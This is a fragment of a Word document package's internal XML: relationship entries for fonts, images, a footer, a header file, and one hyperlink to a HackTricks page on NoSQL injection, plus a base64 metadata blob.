Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/pentesting-web/nosql-injection"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IBMPlexSans-regular.ttf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSans-bold.ttf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSans-italic.ttf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSans-boldItalic.ttf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-italic.ttf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-bold.ttf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-boldItalic.ttf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-regular.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25.jpg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.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28.png"/></Relationships>
</file>

<file path=word/_rels/header3.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1"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9xvUELvhYnAcn3kp8euHu5mNKPw==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLjE3NWY1Y3M5NHowbzgAciExRjlnMnAybVhUS2RKdFlsSnJUYVRDY01VVUJWU3EtV2s=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